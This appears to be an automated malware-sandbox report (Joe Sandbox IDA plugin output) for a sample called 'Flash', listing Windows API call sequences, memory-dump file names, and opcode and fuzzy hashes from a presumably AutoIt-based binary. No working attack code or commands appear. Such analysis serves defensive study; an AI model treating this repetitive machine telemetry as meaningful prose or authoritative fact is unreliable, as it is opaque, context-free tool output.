                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                        • String ID:
                                                        • API String ID: 3008561057-0
                                                        • Opcode ID: b4250fb9b7decc9896e5b1687392b95b34baa5b768a2e5d3ed85e8c021ac7501
                                                        • Instruction ID: c9142126dd231f95a9eac1dc1de4d8217171395bdcf7b38f6721b9fbb85ed96f
                                                        • Opcode Fuzzy Hash: b4250fb9b7decc9896e5b1687392b95b34baa5b768a2e5d3ed85e8c021ac7501
                                                        • Instruction Fuzzy Hash: FE11B131901614FFDB11EFA8EC19FAF7BBAFB46715F108129E84597210C77A9942CB60
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00A29200
                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00A29207
                                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00A29216
                                                        • CloseHandle.KERNEL32(00000004), ref: 00A29221
                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00A29250
                                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 00A29264
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                        • String ID:
                                                        • API String ID: 1413079979-0
                                                        • Opcode ID: b6773edf277225b83e4fca5119c77827620e1d75cd196547f196c89d50fd8663
                                                        • Instruction ID: 6c86318de726c7d4965d075dd021c70fc6443b4643e60da5ff516d5bc2fe6a6f
                                                        • Opcode Fuzzy Hash: b6773edf277225b83e4fca5119c77827620e1d75cd196547f196c89d50fd8663
                                                        • Instruction Fuzzy Hash: 0E114A7250120AEBDB02CFD8ED49FDB7BB9EF08704F044124FA04A2160C7B19DA1DB60
                                                        APIs
                                                        • GetDC.USER32(00000000), ref: 00A2C34E
                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00A2C35F
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A2C366
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00A2C36E
                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00A2C385
                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 00A2C397
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: CapsDevice$Release
                                                        • String ID:
                                                        • API String ID: 1035833867-0
                                                        • Opcode ID: dbe57df0daf62478025a2b3da712f14a4f61f9a56b954edc8781c2786e03effc
                                                        • Instruction ID: 09daec35f0a42df467d3630f59132c895b72a9a27f7de002f9e050d0ef4c17ad
                                                        • Opcode Fuzzy Hash: dbe57df0daf62478025a2b3da712f14a4f61f9a56b954edc8781c2786e03effc
                                                        • Instruction Fuzzy Hash: A7014475E00219BFEF109BE59D49E5FBFB8EB48761F004065FA04AB290D6B09D11CFA0
                                                        APIs
                                                          • Part of subcall function 009D16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 009D1729
                                                          • Part of subcall function 009D16CF: SelectObject.GDI32(?,00000000), ref: 009D1738
                                                          • Part of subcall function 009D16CF: BeginPath.GDI32(?), ref: 009D174F
                                                          • Part of subcall function 009D16CF: SelectObject.GDI32(?,00000000), ref: 009D1778
                                                        • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00A5C57C
                                                        • LineTo.GDI32(00000000,00000003,?), ref: 00A5C590
                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00A5C59E
                                                        • LineTo.GDI32(00000000,00000000,?), ref: 00A5C5AE
                                                        • EndPath.GDI32(00000000), ref: 00A5C5BE
                                                        • StrokePath.GDI32(00000000), ref: 00A5C5CE
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                        • String ID:
                                                        • API String ID: 43455801-0
                                                        • Opcode ID: e4fd6603d3e64448a183ffb9bd6c34772ad57e3a24a3917b4dec4e9ef42068a7
                                                        • Instruction ID: ee67ce1e8ce8929904ed67fb52680059063201941c1b3f4f6c3b8267f882ee79
                                                        • Opcode Fuzzy Hash: e4fd6603d3e64448a183ffb9bd6c34772ad57e3a24a3917b4dec4e9ef42068a7
                                                        • Instruction Fuzzy Hash: 75110C7204010CBFDF029F90DC48F9A7F6DEB04354F058011F9195A160D7B1AE95DBA0
                                                        APIs
                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 009F07EC
                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 009F07F4
                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 009F07FF
                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 009F080A
                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 009F0812
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 009F081A
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Virtual
                                                        • String ID:
                                                        • API String ID: 4278518827-0
                                                        • Opcode ID: 3d6f3edf5f7929d757b51e134dddf1a73cb500045117055d42bbea4294695f95
                                                        • Instruction ID: 26126f10bbdb9b35cd8974d330fe6a5d3b291bcdc5e2e4c3a69cc3b51718ba0f
                                                        • Opcode Fuzzy Hash: 3d6f3edf5f7929d757b51e134dddf1a73cb500045117055d42bbea4294695f95
                                                        • Instruction Fuzzy Hash: D70148B09017597DE3008F5A8C85A53FEA8FF59354F00411BA15847941C7F5A864CBE5
                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00A359B4
                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00A359CA
                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00A359D9
                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A359E8
                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A359F2
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A359F9
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                        • String ID:
                                                        • API String ID: 839392675-0
                                                        • Opcode ID: f584ac1716c6b9ed6f8981fd897f0229c90ff03eaa9f7a7532a1c607a51b7daa
                                                        • Instruction ID: 9403aeadfd6c0c9d0b3658d30106fb9d4375fcd87ba1904bbbfb697f81d937fa
                                                        • Opcode Fuzzy Hash: f584ac1716c6b9ed6f8981fd897f0229c90ff03eaa9f7a7532a1c607a51b7daa
                                                        • Instruction Fuzzy Hash: 97F01D36641158BBE7219BD2DC0DEEF7A7CEBC6B12F000159FA0591050D7E01A5286B5
                                                        APIs
                                                        • InterlockedExchange.KERNEL32(?,?), ref: 00A377FE
                                                        • EnterCriticalSection.KERNEL32(?,?,009DC2B6,?,?), ref: 00A3780F
                                                        • TerminateThread.KERNEL32(00000000,000001F6,?,009DC2B6,?,?), ref: 00A3781C
                                                        • WaitForSingleObject.KERNEL32(00000000,000003E8,?,009DC2B6,?,?), ref: 00A37829
                                                          • Part of subcall function 00A371F0: CloseHandle.KERNEL32(00000000,?,00A37836,?,009DC2B6,?,?), ref: 00A371FA
                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00A3783C
                                                        • LeaveCriticalSection.KERNEL32(?,?,009DC2B6,?,?), ref: 00A37843
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                        • String ID:
                                                        • API String ID: 3495660284-0
                                                        • Opcode ID: c8b0e58782cba321b4429eeca5c5cd44bf79d141cc03e860319a1cf8004c6c02
                                                        • Instruction ID: e52b5ae1b00c4c1c626097fd8855fee0e0093c1833e590e55c3f163d6b3e5c66
                                                        • Opcode Fuzzy Hash: c8b0e58782cba321b4429eeca5c5cd44bf79d141cc03e860319a1cf8004c6c02
                                                        • Instruction Fuzzy Hash: 94F05E72155212ABD7226BB4EC8DEEF7739FF45702F140921F202950A0CBF55882CB60
                                                        APIs
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A29555
                                                        • UnloadUserProfile.USERENV(?,?), ref: 00A29561
                                                        • CloseHandle.KERNEL32(?), ref: 00A2956A
                                                        • CloseHandle.KERNEL32(?), ref: 00A29572
                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00A2957B
                                                        • HeapFree.KERNEL32(00000000), ref: 00A29582
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                        • String ID:
                                                        • API String ID: 146765662-0
                                                        • Opcode ID: 5c1cf566641bcfa9b97b34f9d94fcd32068f5ebcd676717138c4b0e1d48ba7ec
                                                        • Instruction ID: 8845ccf5f5c298c60607402a63da4caaab5da936d942cf15eb0d9bb08aabdc39
                                                        • Opcode Fuzzy Hash: 5c1cf566641bcfa9b97b34f9d94fcd32068f5ebcd676717138c4b0e1d48ba7ec
                                                        • Instruction Fuzzy Hash: 89E0C236004501BBDA029BE1EC0CD5ABF39FB4A722B104620F31585170CBB2A4A2DB50
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 00A48CFD
                                                        • CharUpperBuffW.USER32(?,?), ref: 00A48E0C
                                                        • VariantClear.OLEAUT32(?), ref: 00A48F84
                                                          • Part of subcall function 00A37B1D: VariantInit.OLEAUT32(00000000), ref: 00A37B5D
                                                          • Part of subcall function 00A37B1D: VariantCopy.OLEAUT32(00000000,?), ref: 00A37B66
                                                          • Part of subcall function 00A37B1D: VariantClear.OLEAUT32(00000000), ref: 00A37B72
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                        • API String ID: 4237274167-1221869570
                                                        • Opcode ID: 2ac1a2393edebce6c6d3da2feb7900b4ea2995e75a46c5d2719cd725d01b01a1
                                                        • Instruction ID: f42f3620ff8bb9d9f0c15beed209499feea8c34d1a126263368be329cc90fa6b
                                                        • Opcode Fuzzy Hash: 2ac1a2393edebce6c6d3da2feb7900b4ea2995e75a46c5d2719cd725d01b01a1
                                                        • Instruction Fuzzy Hash: 649189746083019FC710DF24D48195EBBF5AFC9354F14896EF89A8B3A2DB30E949CB52
                                                        APIs
                                                          • Part of subcall function 009E436A: _wcscpy.LIBCMT ref: 009E438D
                                                        • _memset.LIBCMT ref: 00A3332E
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00A3335D
                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00A33410
                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00A3343E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                        • String ID: 0
                                                        • API String ID: 4152858687-4108050209
                                                        • Opcode ID: 51b5d08daf42695b17749aedd049e0a7989b59b6bab5527a7dc5fd1292f76861
                                                        • Instruction ID: c9aec8fe050a92ef49b960bb83069b498968f9952868f69cc906664c552eaec1
                                                        • Opcode Fuzzy Hash: 51b5d08daf42695b17749aedd049e0a7989b59b6bab5527a7dc5fd1292f76861
                                                        • Instruction Fuzzy Hash: 0951AF3260C301ABDB16DF68C845A6FB7E8AF95721F044A2EF895D71A1DB70CE44CB52
                                                        APIs
                                                        • _memset.LIBCMT ref: 00A32F67
                                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00A32F83
                                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 00A32FC9
                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00A97890,00000000), ref: 00A33012
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Menu$Delete$InfoItem_memset
                                                        • String ID: 0
                                                        • API String ID: 1173514356-4108050209
                                                        • Opcode ID: f8497e36c9e1f3e8501434d04257ba30ac56a2eb46e4a2c11bef838a6f2f2393
                                                        • Instruction ID: 64d4bf13d61d440b3e9f4700a286e24f1a521b4da4632b5de282ac4d581572d7
                                                        • Opcode Fuzzy Hash: f8497e36c9e1f3e8501434d04257ba30ac56a2eb46e4a2c11bef838a6f2f2393
                                                        • Instruction Fuzzy Hash: 6341E632208341AFDB24DF24C885F5ABBE4EF85320F14461EF5A6972D1DB70EA05CB52
                                                        APIs
                                                          • Part of subcall function 009E1A36: _memmove.LIBCMT ref: 009E1A77
                                                          • Part of subcall function 00A2B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00A2B7BD
                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00A29ACC
                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00A29ADF
                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 00A29B0F
                                                          • Part of subcall function 009E1821: _memmove.LIBCMT ref: 009E185B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$_memmove$ClassName
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 365058703-1403004172
                                                        • Opcode ID: fd4929ef83e9673fc0b9c3e14ee0d4e79eeac9efcb9e986d2b43ab67ba8ae7df
                                                        • Instruction ID: 202c6b7215cd407780c5cfbad13d4f1295dd7d75b47aa1b124adbd79dc667746
                                                        • Opcode Fuzzy Hash: fd4929ef83e9673fc0b9c3e14ee0d4e79eeac9efcb9e986d2b43ab67ba8ae7df
                                                        • Instruction Fuzzy Hash: B3210175901104BEDB14EBA8EC46DFFB77CDF85360F104129F821932E1DB740D868620
                                                        APIs
                                                          • Part of subcall function 009D2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 009D214F
                                                          • Part of subcall function 009D2111: GetStockObject.GDI32(00000011), ref: 009D2163
                                                          • Part of subcall function 009D2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 009D216D
                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00A56A86
                                                        • LoadLibraryW.KERNEL32(?), ref: 00A56A8D
                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00A56AA2
                                                        • DestroyWindow.USER32(?), ref: 00A56AAA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                        • String ID: SysAnimate32
                                                        • API String ID: 4146253029-1011021900
                                                        • Opcode ID: 49aa6f5de2d2e850c2770c4b611750565bcec911b6dcdc4c31802fd95470a353
                                                        • Instruction ID: bae1cc4146aa21fdcb43d703358a2c9e9363b7207ab03011a8ebc92960d841dc
                                                        • Opcode Fuzzy Hash: 49aa6f5de2d2e850c2770c4b611750565bcec911b6dcdc4c31802fd95470a353
                                                        • Instruction Fuzzy Hash: C0218B71200205AFEF208FA4DC80EBB77B9FB593A5F908619FF51A31A0D7719C959760
                                                        APIs
                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00A37377
                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00A373AA
                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00A373BC
                                                        • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00A373F6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: CreateHandle$FilePipe
                                                        • String ID: nul
                                                        • API String ID: 4209266947-2873401336
                                                        • Opcode ID: 6f38a85977996ea877593183ee8bf56efecf4fb8e8a6a60dcf181a6f40caa06c
                                                        • Instruction ID: 3ce3c5a29caadc68e0847cae960498ea64ae047574a34dcb6ba3990193ee0fe6
                                                        • Opcode Fuzzy Hash: 6f38a85977996ea877593183ee8bf56efecf4fb8e8a6a60dcf181a6f40caa06c
                                                        • Instruction Fuzzy Hash: 232192B450830AABDB309F68DC05E9E7BB4AF55720F204A19FDA1DB2D0D7B0D855DB50
                                                        APIs
                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00A37444
                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00A37476
                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00A37487
                                                        • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00A374C1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: CreateHandle$FilePipe
                                                        • String ID: nul
                                                        • API String ID: 4209266947-2873401336
                                                        • Opcode ID: cde4b9328907d436d0a063bfe4e36d2fdc7435bc02b123c3c603d9a771fa7856
                                                        • Instruction ID: 7196790f2bd72e908148737aa80ec0d32270f68e4b46cb14d97829204c1286ae
                                                        • Opcode Fuzzy Hash: cde4b9328907d436d0a063bfe4e36d2fdc7435bc02b123c3c603d9a771fa7856
                                                        • Instruction Fuzzy Hash: 6B21A4B15083059BDB309F689C45E9E7BB8AF55730F204B19F9A1D72D0D770E891CB50
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 00A3B297
                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00A3B2EB
                                                        • __swprintf.LIBCMT ref: 00A3B304
                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,00A60980), ref: 00A3B342
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
